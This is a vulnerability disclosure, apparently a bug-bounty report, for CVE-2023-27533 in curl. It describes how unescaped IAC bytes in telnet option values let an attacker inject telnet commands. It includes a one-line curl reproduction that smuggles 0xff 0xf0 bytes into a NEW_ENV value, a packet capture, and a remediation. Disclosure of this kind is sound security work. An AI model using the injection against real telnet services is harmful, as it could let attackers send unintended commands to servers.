CVE-2023-27533: Telnet option IAC injection

## Summary: `CURLOPT_TELNETOPTIONS` allows setting various telnet options for telnet protocol. Due to missing encoding of "Interpret as Command" `IAC` (0xff) character, the attacker who can control these option values can escape out of the telnet subnegotiation and enter arbitrary TELNET commands (*) via the `CURLOPT_TELNETOPTIONS` options. `TTYPE`, `XDISPLOC` and `NEW_ENV` options are affected. *) TELNET command refers to "TELNET COMMAND STRUCTURE" in RFC 854 ## Steps To Reproduce: 1. `curl --telnet-option NEW_ENV=a,b$(echo -ne "\xff\xf0INJECTED") telnet://server` When inspected with tcpdump: ``` 20:57:34.454720 IP x.x.x.x.53864 > y.y.y.y.telnet: Flags [P.], seq 17:37, ack 22, win 2058, options [nop,nop,TS val 1459077881 ecr 3403052525], length 20 [telnet SB NEW-ENVIRON IS 0 0x61 0x1 0x62 SE] 0x0000: 4502 0048 0000 4000 4006 265a XXXX XXXX E..H..@.@.&ZXXXX 0x0010: YYYY YYYY d268 0017 12a4 daa2 6603 9cb6 YYYY.h......f... 0x0020: 8018 080a f840 0000 0101 080a 56f7 c2f9 [email protected]... 0x0030: cad6 75ed fffa 2700 0061 0162 fff0 494e ..u...'..a.b..IN 0x0040: 4a45 4354 4544 fff0 JECTED.. ``` ## Remediation - Double encode "Interpret as Command" (`IAC`) (0xff) if it is encountered when constructing the suboption data to be sent. ## Supporting Material/References: * RFC 854 - https://www.rfc-editor.org/rfc/rfc854 ## Impact Attacker being able to specify `TTYPE`, `XDISPLOC` or `NEW_ENV` values is able to inject unintended TELNET commands to the telnet connection. Depending on the use case of the telnet protocol, this may allow the attacker to inject commands or other controlling operations. The practical impact is context specific, but in worst case this could for example allow executing arbitrary OS commands on target system.